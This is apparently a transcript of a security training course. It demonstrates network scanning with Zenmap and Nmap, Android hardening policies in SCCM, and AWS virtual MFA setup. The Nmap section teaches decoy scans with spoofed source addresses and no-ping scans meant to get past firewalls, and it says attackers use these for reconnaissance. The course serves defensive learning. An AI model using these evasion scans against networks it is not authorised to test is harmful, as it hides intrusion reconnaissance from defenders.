we conduct vulnerability scans, so that we can identify weaknesses and harden our network environment.
[Video description begins] He hovers over the Hostname column header values. [Video description ends]
The bad guys would use the same type of tool and techniques to perform reconnaissance, to find weaknesses
that they can exploit. So we want to make sure we get to it before they do. We can also click the Topology tab
here.
[Video description begins] The Topology tab displays three buttons, named Hosts Viewer, Fisheye, and
Controls and the diagram of the hosts found on the network. The diagram shows the connections between the
hosts on the network. The different hosts on the network are 192.168.0.2, 192.168.0.20, 192.168.0.13,
192.168.0.252, 192.168.0.11, 192.168.0.9, 192.168.0.8, 192.168.0.5, 192.168.0.12, 192.168.0.7, 192.168.0.6,
and 192.168.0.1. [Video description ends]
Now, I can't really see the devices here that it's found on my network. If I click Fisheye, it spreads them out a
little bit.
[Video description begins] The list of controls includes the Zoom control. [Video description ends]
But I can also click on Controls, which shows me a list of controls over in the right-hand side of the screen.
And one of the things I can do is actually zoom in.
[Video description begins] He zooms in the diagram using the Zoom control. [Video description ends]
Now when I've done that, notice that I have got circles for each detected host and they are different colors.
Some are green, some are yellow, some are red. The idea is that green means that it has less than three open
ports that were discovered. But if it's got between three and six open ports, it'll be yellow and red is not good
because it's got more than six open ports. And of course, the larger the circle, the more open ports that were
discovered. The little padlock means that there are some filtered ports on that device normally due to firewall
settings on a host-based firewall.
[Video description begins] He clicks the Host Details tab. It does not display anything. [Video description
ends]
We can also click Host Details over here to view specific host details, which we could also trigger from the
Topology.
[Video description begins] He clicks the Topology tab. He then clicks the Hosts Viewer button. The Hosts
Viewer window opens. It is divided into two parts. The first part is the Hosts pane. It displays a list of hosts,
which includes 192.168.0.6. The second part contains the General, Services, and Traceroute tabs. The
General tab is selected. It contains three expandable sections, named General information, Operating System,
and Sequences. The General information section is expanded. It contains the Address and Hostname drop-
down list boxes. [Video description ends]
Actually, I'll do it from here, because if I click Host Viewer, I get a list of the hosts.
[Video description begins] He hovers over the list of hosts in the Hosts pane. [Video description ends]
Again, we now know what the color coding means, and so I could click on one of them.
[Video description begins] He clicks the 192.168.0.6 host. The Address drop-down list box shows the value,
[ipv4] 192.168.0.6. The Hostname drop-down list box does not show any value. [Video description ends]
We haven't done an intense scan, so we don't see any operating system info.
[Video description begins] He expands the Operating System expandable section. It shows the message: No
OS information. [Video description ends]
[Video description begins] He clicks the Services tab. It contains three tabs: Ports (2), Extraports (98), and
Special fields. The Ports (2) tab is selected by default. It displays a table with five column headers: Port,
Protocol, State, Service, and Method. The Port column header has the values, 22 and 80. The Protocol column
header has the value, tcp, for all the rows. The State column header has the value, open, for all the rows. The
Service column header has the values, ssh and http. The Method column header has the value, table, for all the
rows. [Video description ends]
And of course, with fewer than three open ports, that is when we have a device or a host that shows up with a
green color, as listed here.
[Video description begins] He closes the Hosts Viewer window. [Video description ends]
We can also see any past scans; here is our current scan, which currently has a status of Unsaved.
[Video description begins] He clicks the Scans tab. It shows two column headers: Status and Command. The
Status column header has the value, Unsaved. The Command column header has the value, nmap -T4 -F
192.168.0.1-254. [Video description ends]
So we can go to the scan menu and we can save the scan as an XML document.
[Video description begins] He clicks Save Scan in the Scan menu. The Save Scan dialog box opens. It includes
the Name text box, Select File Type drop-down list box, and the Cancel and Save buttons. The Name text box
contains the value, .xml. The Select File Type drop-down list box shows the value, Nmap XML format
(.xml). [Video description ends]
So that we could perhaps establish a baseline of what is normal and what should be on the network.
[Video description begins] He clicks the Cancel button, and the Save Scan dialog box closes. [Video
description ends]
And what is cool is that we can also go to the Tools menu and compare two scans to see what has changed over
time, such as the presence of a new machine on the network that perhaps shouldn't be there.
[Video description begins] He clicks Compare Results in the Tools menu. The Compare Results window opens.
It contains two sections, A Scan and B Scan. Both these sections includes a drop-down list box and the Open
button. [Video description ends]
[Video description begins] He closes the Compare Results window. [Video description ends]
And it's one of those things that we should run on a periodic basis to make sure we know what is on the
network and whether or not we've got too many vulnerabilities.
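That baseline-and-compare workflow can also be scripted outside the GUI. Nmap ships with the ndiff utility for comparing two saved XML scans; a sketch, with file names chosen just for illustration:

# Save a baseline scan, and later a current scan, in Nmap XML format
nmap -T4 -F -oX baseline.xml 192.168.0.1-254
nmap -T4 -F -oX current.xml 192.168.0.1-254

# Report hosts, ports, and services that changed between the two scans
ndiff baseline.xml current.xml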
[Video description begins] Topic title: Conduct a Vulnerability Assessment Using Linux. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll conduct a network vulnerability scan from a Linux station. I'm using Kali Linux,
which is a Linux distribution that contains many security tools including Nmap, which we can use to conduct a
vulnerability scan.
[Video description begins] The root@kali: ~ command line window is open. The root@kali:~# prompt is
displayed. [Video description ends]
Here from the command line on Kali Linux, I'm going to run Nmap. And I'm just going to give it a single IP
address so that I can scan just a single host.
[Video description begins] He executes the command: nmap 192.168.0.1. The scanning for 192.168.0.1 gets
completed and the report is displayed in the output. The prompt does not change. [Video description ends]
After a moment, we can see the scan is completed for, in this case, 192.168.0.1. And we can see a number of
ports that are listed as being open, such as TCP 53 for DNS (used for zone transfers between DNS servers),
and ports 80 and 443 for HTTP and HTTPS respectively.
[Video description begins] He highlights the table entries displayed in the output. The table has three column
headers: PORT, STATE, and SERVICE. The PORT column header has the values: 53/tcp, 80/tcp, 443/tcp, and
5000/tcp. The STATE column header has the value, open, for all the rows. The SERVICE column header has
the values: domain, http, https, and upnp. [Video description ends]
TCP port 5000 is for UPnP; that is one you probably want to close where you can, unless you absolutely need
Universal Plug and Play running. And then I might also have some filtered ports, which normally means a
firewall is configured to prevent them from being accessed. And there I can also see the MAC Address.
[Video description begins] He highlights filtered in the output lines: 8081/tcp filtered blackice-icecap 8082/tcp
filtered blackice-alerts. [Video description ends]
Now, here from the Nmap command line, what I also want to do is scan the network and perform a few extra
things.
[Video description begins] He executes the command: clear. The prompt does not change. [Video description
ends]
So I'm going to run nmap. And I'm going to do 192.168.0. Now, I could either put .1-254 here or, to scan the
entire subnet, I could put .0 and then the subnet mask as a number of bits. This is CIDR notation: it's a /24, so
a 24-bit subnet mask. In other words, 255.255.255.0, which really means 192.168.0 is my network address. So
I'm going to scan the subnet. I'm going to scan for port 80 with -p80. Now remember, in Linux lowercase and
uppercase have different meanings, so make sure you're careful about that. And I'm going to use the -D
parameter, for decoy. What this lets me do is specify a couple of other IP addresses that this scan will appear to
have originated from. So I'm just going to put in a couple of other random IPs; it doesn't matter which subnet
they're on. In addition to my own IP, this is what the scan will look like it's coming from as it executes. This is
something attackers would do when they're performing reconnaissance.
And you'll find that if you want to perform an Nmap scan from outside of a firewall that might be blocking
ICMP traffic (commands like ping and traceroute use ICMP), you might want to also pass a -P0 here. What
this really means is that it tells Nmap not to send out the initial ping messages it normally does by default.
This way the scan has a better chance of getting through firewalls that might block ICMP ping traffic. So I'm
going to go ahead and press Enter to begin this scan.
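Pulled together, the command being described would look something like the following. The decoy addresses match the ones that appear in the packet capture shown shortly, ME marks where our own address sits in the decoy list, and -Pn is the current spelling of the older -P0 option:

# Scan the whole /24 for port 80, appearing to come from two decoys as well
# as ourselves, and skip the initial host-discovery pings
nmap -p 80 -D 1.1.1.1,1.1.1.3,ME -Pn 192.168.0.0/24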
And we can now see that the scan has completed. So we can see the Nmap scan report for specific ports on a
given MAC address and IP address.
[Video description begins] He highlights the output lines: Nmap scan report for 192.168.0.252 Host is up
(0.073s latency). PORT 80/tcp STATE closed SERVICE http MAC Address: 00:00:CA:01:02:03 (Arris
Group). [Video description ends]
And by the way, if you're wondering what command line parameters are available, you can view them by
looking at the man page, the help page.
[Video description begins] He executes the command: clear. The prompt does not change. [Video description
ends]
So man space nmap and then from here, I can go through the help system, navigate through it, to get a
description about how it works.
[Video description begins] He executes the command: man nmap. The Nmap reference guide is displayed as
output. [Video description ends]
And then eventually as we go further down, we'll start seeing all of the command line parameters. And
remember, that upper and lower case letters have a different meaning.
[Video description begins] The Wi-Fi window is open. It is divided into six parts. The first part is the menu
bar. The second part is the toolbar. The third part includes the Apply a display filter ... <Ctrl-/> search box.
The fourth part contains a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 7110 and 7111. The Time column header includes the
values: 11.634610 and 11.634723. The Source column header includes the value: 192.168.0.20. The
Destination column header includes the values: 1.1.1.1 and 1.1.1.3. The Protocol column header includes the
value: TCP. The Length column header includes the value: 54. The Info column header includes the value: 80
-> 41701 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0. The fifth part includes the statement: Transmission
Control Protocol, Src Port: 80, Dst Port: 41701, Seq: 1, Ack: 1, Len: 0. The sixth part includes 0000 2c 99 24
5a 17 c0 18 56 80 c3 68 ba 08 00 45 00 ,.$Z...V ..h...E. [Video description ends]
While the scan was running, I was capturing network traffic on the same host from which the scan was being
run. And notice that we've got some listings here related to 1.1.1.1 and 1.1.1.3. There are plenty of other ones
throughout the packet capture that were part of the decoy addresses we wanted to make sure were passed
along with our Nmap scan.
[Video description begins] He scrolls through the table entries. [Video description ends]
So that it looks like the scan came from a number of different hosts and not just our specific IP address.
After completing this video, you will be able to describe the importance of securing mobile devices.
Objectives
[Video description begins] Topic title: Mobile Device Access Control. The presenter is Dan Lachance. [Video
description ends]
Most organizations these days allow their employees to use mobile devices for increased productivity.
[Video description begins] Mobile Device Access Control [Video description ends]
That is not to say there is no risk in engaging in this activity. There is risk because we've got an entry point for
malware potentially, especially if people are using smartphones also for personal use. So we have to consider
the mobile devices and the apps they're using, whether they're custom built by the organization or whether they
are standard off-the-shelf apps. And we can determine which ones should be allowed to be used by users.
We then have to determine whether mobile devices are using things like certificate authentication. That could
be applicable for VPN access when people are not at the office and want to use their smartphone to access
sensitive systems owned by the organization or sensitive data that results from the use of those systems.
Mobile device management, otherwise called MDM, allows us to centrally control the security settings and to
manage things like applications on mobile devices on a large scale. So we can have a centralized device
inventory so that we know which devices are out there.
How many iOS devices, how many Android devices, and also, which apps are installed on them, and how up
to date they are with virus signatures and so on. So we have centralized management as well as centralized
reporting available as a result of this. Now that is not to mention that we've got centralized configuration to
control all of these items as well. Organizations might allow users to bring their own device.
Bring your own device, otherwise called BYOD, allows users to use their personal smartphone for business
use. Certainly, there is risk involved with this. But another potential option is corporate owned personally
enabled devices, otherwise called COPE. This means that the company purchases and owns the device and
allows users to use it of course for business use as well as personal use. But the difference is that the company
gets to control things like the device type. They can all be the same which allows for easier consistent device
management.
Also, the organization can determine how hardened the devices are right from the beginning, because the company has
access to the device first. But what is the challenge with this? Well, the challenge with using either bring your
own device or corporate owned personally enabled devices, which is very popular these days, is to make sure
we somehow keep personal and organizational apps and data and settings separate from one another on the
single device. And often with mobile device management solutions, this is referred to as mobile device dual
persona. Because it's being used for personal use, and it's being used for business use. So what can we do to
harden mobile devices, ideally centrally from our mobile device management solution?
Well, we can enable strong authentication, whether it's strong passwords or multi-factor authentication, MFA,
perhaps where the user is sent a code through SMS text messaging as they try to log in with a username and a
password, or maybe their device needs a PKI certificate. We should also consider enabling remote wipe. So
that if a device is lost or stolen, the IT team has the ability to wipe it so that any sensitive data will not be
available to whoever stole the device, for example. We can also enable device tracking, whether it's through
Internet connectivity or by cell towers, and so on. This way, we can determine where the device is, if it's been
lost or stolen or to track employee locations.
Of course, this is possible with satellite technology through GPS, the Global Positioning System, as well.
Geofencing is another interesting option, where essentially we can control which apps are available, or how
they behave, or even how security settings are applied, depending on the physical location of the user device.
So maybe a sensitive application can only be used when the user is at work with their device. Once they leave
the building, the app is no longer available. And certainly on a personal level, we might have run into this.
If we've gone shopping somewhere and all of a sudden we get a welcome text message or an in-app
notification from the mall or shopping center, or maybe certain coupons become available because we're in a
certain location, and so on. That is all referred to as geofencing.
Other device hardening options include making sure that the mobile device has a firewall installed. Not just at
the network perimeter but every single computing device should have a personal firewall configured
appropriately as well as antimalware scanning configured. We can also enable encryption on mobile devices
for data at rest, whether it's on the device itself or removable micro SD card. We can also enable encryption for
data in transit for that mobile device through IPsec, which allows us to encrypt all network communications
regardless of the application being used. We could even use a VPN that the user could authenticate to when
they're working away from the office to give them a secure tunnel over the Internet to resources available in
the office. We can also disable a number of settings.
Part of hardening anything is disabling things that are not needed in order to reduce the attack surface. Things
like disabling Bluetooth if we don't need it, disabling connectivity to public Wi-Fi hotspots, preventing users or
removing the ability for them to install apps or perhaps limiting which apps they can install. Enabling GPS
tracking is sometimes good for remote tracking, but in another sense we also might want to disable it. Such as
for members of the military or law enforcement that might use organizationally supplied smartphone devices.
Also, we might disable the camera or microphone for privacy reasons.
Finally, we can also enable data loss prevention, or DLP, through the installation of a software agent on the mobile
device that is controlled by a central management solution. Data loss prevention means we want to prevent or
minimize any sensitive data from being leaked outside of the organization. So a software agent gets installed
on the device and centralized policies that we get to configure will determine how sensitive data is treated. So
for example, we might make sure that users of a smartphone are unable to send e-mail attachments that
contain sensitive data to external e-mail addresses outside of the organization.
[Video description begins] Topic title: Configure Mobile Device Hardening Policies. The presenter is Dan
Lachance. [Video description ends]
In this demonstration, I'll configure centralized mobile device hardening policies. There are plenty of tools out
there that let you do this, like MobileIron or Microsoft System Center Configuration Manager, along with
Microsoft Intune. So in this case, we'll be using Microsoft System Center Configuration Manager. So here in
my Server 2016 installation, I've already installed SCCM, System Center Configuration Manager. So I'm going
to go ahead and fire up the System Center Config Manager console.
[Video description begins] The System Center Configuration Manager window is divided into four parts. The
first part is the menu bar. The second part is the address bar. The third part is divided into two sections. The
first section is the Administration pane. It contains the Overview root node, which includes the Cloud Services
subnode. The second section includes the Assets and Compliance and Monitoring options. The fourth part is
the content pane. It displays the Administration page. It has two expandable sections. The first section is the
Navigation Index, and the second section is the Recent Alerts (0) - Last updated: 1/8/2019 10:24:37
AM. [Video description ends]
The next thing I need to do is to go into the Assets and Compliance workspace.
[Video description begins] He clicks the Assets and Compliance option. The Assets and Compliance pane
opens in the first section of the third part and the Compliance Settings page opens in the content pane. The
Assets and Compliance pane contains the Overview root node. This node includes the Compliance Settings
subnode. [Video description ends]
So I've clicked on that in the bottom-left and then in the left hand navigator, I'll expand Compliance Settings.
[Video description begins] The Compliance Settings subnode includes the Configuration Items and
Configuration Baselines options. [Video description ends]
I need to create what is called a configuration item that contains my mobile device hardening settings.
[Video description begins] He clicks the Configuration Items option. The content pane includes a table. This
table has the column headers: Icon, Name, Type, Device Type, Revision, Child, Relationships, User Setting,
and Date Modified. [Video description ends]
Then I need to add it to a configuration baseline and deploy that to a collection of devices.
[Video description begins] He clicks the Configuration Baselines option. The content pane includes a table
and the Summary and Deployments tabs. The table has the column headers: Icon, Name, Status, Deployed,
User Setting, Date Modified, Compliance Count, Noncompliance Count, Failure Count, and Modified
By. [Video description ends]
Then we'll be hardening our mobile environment. So I'm going to start by right-clicking on Configuration
Items and choosing Create Configuration Item.
[Video description begins] He right-clicks the Configuration Items option and selects the Create
Configuration Item option. The Create Configuration Item Wizard opens. It displays the General page. This
page includes the Name text box, Android and Samsung KNOX radio button, and the Next button. [Video
description ends]
I'm going to call this Harden Lollipop, because we're going to apply this to the Android version 5 operating
system which is called Lollipop. Android always has great, yummy, sweet names for its operating system
versions, like Marshmallow, and in this case Lollipop.
[Video description begins] He types Harden Lollipop in the Name text box. [Video description ends]
So down below, I'm going to choose Android and Samsung KNOX and then I'll click Next.
[Video description begins] He selects the Android and Samsung KNOX radio button. [Video description ends]
Then I can expand the Android operating system, and I can determine the specific versions.
[Video description begins] The Supported Platforms page is displayed. It contains the Android node. [Video
description ends]
So maybe I want to exclude version 4, this is only for Android 5, and then Next.
[Video description begins] The Android node contains the Android KNOX Standard 4.0 and higher, Android
4, and Android 5 checkboxes. These are selected. [Video description ends]
[Video description begins] He clears the Android KNOX Standard 4.0 and higher and Android 4
checkboxes. [Video description ends]
[Video description begins] The Device Settings page is displayed. It includes the Select all, Security,
Encryption, and Compliant and Noncompliant Apps (Android) checkboxes. [Video description ends]
I'll select Compliant and Noncompliant Apps because a lot of security breaches could potentially stem from people installing and running apps that are not allowed to run on the device.
[Video description begins] He selects the Compliant and Noncompliant Apps (Android) checkbox. [Video
description ends]
They might contain malware, or they could reduce the security of the device. So I'm actually going to turn on the check marks for Encryption, Security, and Password as well, and then I'll click Next.
[Video description begins] The Password page is displayed. It includes the Require password settings on
devices drop-down list box, Minimum password length (characters) and Password expiration in days
checkboxes, and the Idle time before device is locked drop-down list box. Each of the checkboxes has a spin
box attached to them. The Minimum password length (characters) and Password expiration in days
checkboxes and the Idle time before device is locked drop-down list box are disabled. [Video description ends]
First thing, we've got password settings. So I'm going to go ahead and choose Required.
[Video description begins] He selects the Required option in the Require password settings on devices drop-
down list box. The Minimum password length (characters) and Password expiration in days checkboxes and
the Idle time before device is locked drop-down list box get enabled. [Video description ends]
And maybe I would set options such as the minimum password length needing to be at least 8 characters, and a password expiration of 7 days.
[Video description begins] He selects the Minimum password length (characters) checkbox and sets the value
of the spin box, adjacent to it, to 8. [Video description ends]
[Video description begins] He selects the Password expiration in days checkbox and sets the value of the spin
box, adjacent to it, to 7. [Video description ends]
There should be no guesswork here when I'm configuring it at this level. Maybe the idle time before the device
is locked, 5 minutes. So you get the idea, we can configure these types of items.
[Video description begins] He selects the 5 minutes option in the Idle time before device is locked drop-down
list box. [Video description ends]
I'll go ahead and click Next. Then I can determine for example, in this case whether the camera is Allowed or
Prohibited.
[Video description begins] The Security page is displayed. It includes the Camera drop-down list box. [Video
description ends]
Maybe Prohibited if it's only work use and we have no need of the camera for work purposes. I'll click Next.
[Video description begins] He selects the Prohibited option in the Camera drop-down list box. [Video
description ends]
And maybe file encryption on the device, I'll apply that as being turned on.
[Video description begins] The Encryption page is displayed. It includes the File encryption on device drop-
down list box. [Video description ends]
[Video description begins] He selects the On option in the File encryption on device drop-down list
box. [Video description ends]
Then I can click Next, and let's say the Google Authenticator app is going to be an important part of an Android device being compliant with these security settings.
[Video description begins] He clicks the Next button. The Android App Compliance page is displayed. It
includes the Add button and the Noncompliant apps list: Use this list to specify the Android apps that will be
reported as noncompliant and the Compliant apps list: Use this list to specify the Android apps that users are
allowed to install. Any other apps will be reported as noncompliant radio buttons. The Noncompliant apps
list: Use this list to specify the Android apps that will be reported as noncompliant radio button is selected by
default. [Video description ends]
[Video description begins] He clicks the Add button. The Add App to the Noncompliant List dialog box opens.
It contains the Name, Publisher, and App URL text boxes and the Add and Cancel buttons. [Video description
ends]
[Video description begins] He types Google Authenticator in the Name text box. [Video description ends]
I've already looked up the Google Authenticator, so I can just go ahead and copy the URL from the address bar in my browser. And then I can simply paste that into the App URL field. So I'll go ahead and add that one; of course, we could add more.
[Video description begins] He clicks the Add button, and the Add App to the Noncompliant List dialog box
closes. [Video description ends]
And I can determine whether I want to look at this from a noncompliant or a compliant perspective.
[Video description begins] He hovers over the Noncompliant apps list: Use this list to specify the Android
apps that will be reported as noncompliant and the Compliant apps list: Use this list to specify the Android
apps that users are allowed to install. Any other apps will be reported as noncompliant radio buttons. [Video
description ends]
So if it's noncompliant, it means use this list to specify the apps that will be reported as noncompliant. Well, I
want this to be compliant.
[Video description begins] He selects the Compliant apps list: Use this list to specify the Android apps that
users are allowed to install. Any other apps will be reported as noncompliant radio button. [Video description
ends]
So if they've got the Google Authenticator, that is good for additional authentication factors for security, then
I'll click Next.
[Video description begins] The Platform Applicability page is displayed. [Video description ends]
And I'm not going to add any exclusions, click Next, and Next again.
[Video description begins] The Summary page is displayed. [Video description ends]
And finally, after a moment, we will have created our configuration item.
[Video description begins] The Progress page is displayed. [Video description ends]
[Video description begins] The Completion page is displayed. [Video description ends]
Close out of that and let's just go back to the config manager console.
[Video description begins] He clicks the Close button, and the Create Configuration Item Wizard
closes. [Video description ends]
And there it is, hardening the Lollipop operating system. We see the config item.
[Video description begins] The Icon column displays the icon. The Name column header has the value,
Harden Lollipop. The Type column header has the value, General. The Device Type column header has the
value, Mobile. The Revision column header has the value, 1. The Child column header has the value, No. The
Relationships column header has the value, No. The User Setting column header has the value, No. The Date
Modified column header has the value, 1/8/2019 10:28 AM. [Video description ends]
So I'm going to go ahead here and go under Configuration Baselines, and I'm going to build a new one and add config items to it.
[Video description begins] He right-clicks the Configuration Baselines option and selects the Create
Configuration Baseline option. The Create Configuration Baseline dialog box opens. It includes the Name text
box, the Add drop-down button, and the OK button. [Video description ends]
I'm going to call this Harden Android Baseline.
[Video description begins] He types Harden Android Baseline in the Name text box. [Video description ends]
And then down below, I'm going to click Add > Configuration Items and I'll choose the Harden Lollipop item
we just created and I'll add that. Click OK and OK.
[Video description begins] He clicks the Add drop-down button and selects the Configuration Items option.
The Add Configuration Items dialog box opens. It is divided into two parts. The first part is Available
configuration items. The second section is Configuration items that will be added to this configuration
baseline. Available configuration items includes a table and the Add button. The table has five column
headers: Name, Type, Latest Revision, Description, and Status. The Name column header includes the value,
Harden Lollipop. The Type column header includes the value, General. The Latest Revision column header
includes the value, 1. The Description column header has no value. The Status column header includes the
value, Enabled. Configuration items that will be added to this configuration baseline includes a table and the
OK button. The table has five column headers: Name, Type, Latest Revision, Description, and Status. These
columns do not have any value. [Video description ends]
[Video description begins] He selects the Harden Lollipop value in the Name column header and clicks the
Add button. The Name, Type, Latest Revision, and Status columns headers of the table in Configuration items
that will be added to this configuration baseline get populated with the values, Harden Lollipop, General,
Revision 1, and Enabled, respectively. He then clicks the OK button to close the Add Configuration Items
dialog box. [Video description ends]
Next thing to do is to right-click on the baseline and to deploy it to a collection of mobile devices.
[Video description begins] He clicks the OK button to close the Create Configuration Baseline dialog
box. [Video description ends]
[Video description begins] The Icon column displays the icon. The Name column header includes the value,
Harden Android Baseline. The Status column header includes the value, Enabled. The Deployed column
header includes the value, No. The User Setting column header includes the value, No. The Date Modified
column header includes the value, 1/8/2019 10:28 AM. The Compliance Count column header includes the
value, 0. The Noncompliance Count column header includes the value, 0. The Failure Count column header
includes the value, 0. The Modified By column header includes the value, FAKEDOMAIN. [Video description
ends]
And here in config manager, I can specify the collection that I want to deploy this configuration baseline to.
[Video description begins] He right-clicks the Harden Android Baseline value in the Name column header and
selects the Deploy option. The Deploy Configuration Baselines dialog box opens. It includes the Collection
text box, the Remediate noncompliant rules when supported checkbox, and the Run every spin box. A Browse
button is present adjacent to the Collection text box. The Allow remediation outside the maintenance window
checkbox is present below the Remediate noncompliant rules when supported checkbox. It is disabled. [Video
description ends]
So I'll go ahead and click Browse. And here, I'm going to go into Device Collections.
[Video description begins] The Select Collection dialog box opens. It is divided into three parts. The first part
contains a drop-down list box and the Root folder. The second part contains the Filter search box and a table
with the column headers: Name and Member Count. The Name column header includes the value, All Users.
The Member Count column header includes the value, 2. The third part includes the OK button. [Video
description ends]
I might have a specific collection for mobile devices. There is a built-in one here called All Mobile Devices.
[Video description begins] He clicks the drop-down list box in the first part and selects the Device Collections
option. The Name column header includes the value, All Mobile Devices. The Member Count column header
includes the value, 0. [Video description ends]
I don't have any mobile devices being managed by SCCM here yet. But if you did, you would see a numeric value here other than 0 under the Member Count for the All Mobile Devices collection. Click OK. Also, I'm going to choose to remediate noncompliance when it's found.
[Video description begins] The Select Collection dialog box closes. [Video description ends]
So if the camera is enabled for example, then I'm going to choose to remediate that by disabling the camera.
[Video description begins] He selects the Remediate noncompliant rules when supported checkbox. The Allow
remediation outside the maintenance window checkbox gets enabled. [Video description ends]
I'm going to run this compliance check against these mobile devices every day.
[Video description begins] He sets the value of the Run every spin box to 1. [Video description ends]
And then I'm going to click OK. And now if I select our Android baseline hardening item, I can go down to
Deployments here at the bottom.
[Video description begins] The Deploy Configuration Baselines dialog box closes. [Video description ends]
And I can see that it's been deployed to the All Mobile Devices collection.
[Video description begins] The Deployments tab includes a table with the column headers: Icon, Collection,
Compliance %, Deployment Start Time, and Action. The Icon column header displays the icon image. The
Collection column header has the value, All Mobile Devices. The Compliance % column header has the value,
0.0. The Deployment Start Time column header has the value, 1/8/2019 10:29 AM. The Action column header
has the value, Remediate. [Video description ends]
[Video description begins] Topic title: Enable a Smartphone as a Virtual MFA Device. The presenter is Dan
Lachance. [Video description ends]
These days, multi-factor authentication is all the rage when it comes to securing user accounts, especially using an out-of-band mechanism to communicate codes, such as to a smartphone with an app installed. So in this
example, I'm going to enable a smartphone as a virtual MFA or multi-factor authentication device for use with
Amazon Web Services.
[Video description begins] The AWS Management Console web page is open. It is divided into four parts. The
first part includes the Services drop-down button. The second part is AWS services. It contains the Find
services search box and the Recently visited services and All services expandable sections. The All services
expandable section is expanded. It includes the Compute and Machine Learning sections. The Compute
section includes the EC2 and ECR options. The Machine Learning section includes the Amazon SageMaker
and AWS DeepLens options. The third part is Access resources on the go. The fourth part is Explore AWS. [Video description ends]
To start with, you need an account with Amazon Web Services or AWS. I've already got one, and I've signed
in to the administrative console. The next thing I'm going to do here, in the AWS Management Console, is I'm
going to take a look at any existing users I might have created in the past. Now, I've already got a user here
that has been added to a group. So we're going to go to take a look at it because we're going to enable MFA, or
multi-factor authentication, for that user. So let's get to it. Let's scroll down, under Security, Identity &
Compliance, I'm going to click IAM, which stands for Identity and Access Management.
[Video description begins] The IAM Management Console web page is displayed. It is divided into three parts.
The first part is the navigation pane. It includes the Users option. The second part is the content pane. The
third part is Feature Spotlight. [Video description ends]
[Video description begins] The content pane includes a table and the Add User and Delete User buttons. The
table has the column headers: User name, Groups, Access key age, Password age, Last activity, and MFA.
The User name column header has the value, jchavez. The Groups column header has the value,
LasVegas_HelpDesk. The Access key age column header has the value, None. The Password age column
header has the value, 34 days. The Last activity column header has the value, 34 days. The MFA column
header has the value, Not enabled. [Video description ends]
And here we have a user called jchavez, that is a member of the LasVegas_HelpDesk group, which gives them
certain permissions to manage AWS cloud resources. But our purpose here is I'm going to click on the
username because we want to enable MFA.
[Video description begins] He clicks the jchavez value in the User name column header. The Summary page
opens. It includes the Permissions and Security credentials tabs. [Video description ends]
And in the user information, I want to go to the Security credentials tab. We can see the assigned MFA device
says Not assigned.
[Video description begins] The Security credentials tab includes the Sign-in credentials section. It includes the
text, Assigned MFA device Not assigned | Manage. Manage is a link. [Video description ends]
[Video description begins] The Manage MFA device dialog box opens. It includes the Virtual MFA device
radio button and the Continue button. The Virtual MFA device radio button is selected. [Video description
ends]
Now, we could use a physical security key or hardware token, physically some kind of device. But here, we're
going to enable a virtual MFA device, which means I've got an authenticator app installed on my smartphone.
And if I don't, I'd have to go to the appropriate app store to install it. So I'm going to go ahead and choose
Continue.
[Video description begins] He clicks the Continue button. The Set up virtual MFA device dialog box opens. It
includes the text, 1. Install a compatible app on your mobile device or computer See a list of compatible
applications 2. Use your virtual MFA app and your device's camera to scan the QR code, 3. Type two
consecutive MFA codes below, and Previous and Assign MFA buttons. list of compatible applications in the
text, See a list of compatible applications, is a link. A box displaying a link, Show QR code, is present below the
text, Use your virtual MFA app and your device's camera to scan the QR code. The MFA code 1 and MFA
code 2 text boxes are given below the text, 3. Type two consecutive MFA codes below. The Assign MFA button
is disabled. [Video description ends]
Now at this point, it tells me to install the compatible app on my mobile device or computer. And if I go to the
list of compatible apps, it'll tell me what is supported.
[Video description begins] He clicks the list of compatible applications link. The Multi-Factor Authentication
web page opens. [Video description ends]
So if I go down, I can see for my virtual MFA device, I can determine which item I can install on a particular
type of platform. So for example, for Android, which I've got, I can install the Google Authenticator.
Anyways, that is fine.
[Video description begins] He closes the Multi-Factor Authentication web page. [Video description ends]
But the next thing we have to do is use the virtual MFA app and the device's camera to scan the QR code that will show up here. I'm going to click to show that QR code.
[Video description begins] He clicks the Show QR code link. The QR code is displayed in the box. [Video
description ends]
So I'm going to pause for a moment here. I'm going to install the Google Authenticator on my Android and scan this QR code. Once you've scanned the QR code with your authenticator app – in my case, Google Authenticator is what I've chosen – the next thing to do is to put in the code that it's going to be displaying. The app on your smartphone will be generating a code that changes periodically, so you have a certain window of time to enter it before you'll be able to authenticate.
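As an aside, the code the authenticator app displays is a time-based one-time password, or TOTP. The following is a minimal PowerShell sketch of the public RFC 6238/4226 algorithm, just to illustrate why the code changes every 30 seconds; the base32 secret in the usage comment is hypothetical and is not the secret from this demo.

function Get-TotpCode {
    param(
        [string]$Base32Secret,   # base32-encoded shared secret (illustrative only)
        [int]$Digits = 6,
        [int]$Period = 30
    )
    # Decode the base32 secret into raw key bytes
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
    $bits = -join ($Base32Secret.ToUpper().TrimEnd('=').ToCharArray() |
        ForEach-Object { [Convert]::ToString($alphabet.IndexOf($_), 2).PadLeft(5, '0') })
    $keyBytes = [byte[]]@(for ($i = 0; $i + 8 -le $bits.Length; $i += 8) {
        [Convert]::ToByte($bits.Substring($i, 8), 2)
    })
    # Time-based counter: number of 30-second periods since the Unix epoch, as 8 big-endian bytes
    $counter = [long][math]::Floor([DateTimeOffset]::UtcNow.ToUnixTimeSeconds() / $Period)
    $counterBytes = [BitConverter]::GetBytes($counter)
    if ([BitConverter]::IsLittleEndian) { [Array]::Reverse($counterBytes) }
    # HMAC-SHA1 plus dynamic truncation (RFC 4226) produces the short numeric code
    $hmac = [System.Security.Cryptography.HMACSHA1]::new($keyBytes)
    $hash = $hmac.ComputeHash($counterBytes)
    $offset = $hash[$hash.Length - 1] -band 0x0F
    $binCode = ((($hash[$offset] -band 0x7F) -shl 24) -bor
                (($hash[$offset + 1] -band 0xFF) -shl 16) -bor
                (($hash[$offset + 2] -band 0xFF) -shl 8) -bor
                ($hash[$offset + 3] -band 0xFF))
    $modulus = [int][math]::Pow(10, $Digits)
    ($binCode % $modulus).ToString().PadLeft($Digits, '0')
}
# Hypothetical usage: Get-TotpCode -Base32Secret 'JBSWY3DPEHPK3PXP'

Because both the app and the service derive the code from the same shared secret and the current time, the service can verify a code without any network connection back to the phone.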
[Video description begins] He types 119558 in the MFA code 1 text box. [Video description ends]
So for example, I'll pop in the code that is being displayed on my device, and then I'll wait for the next code to
show up. It wants two codes before we can complete this procedure.
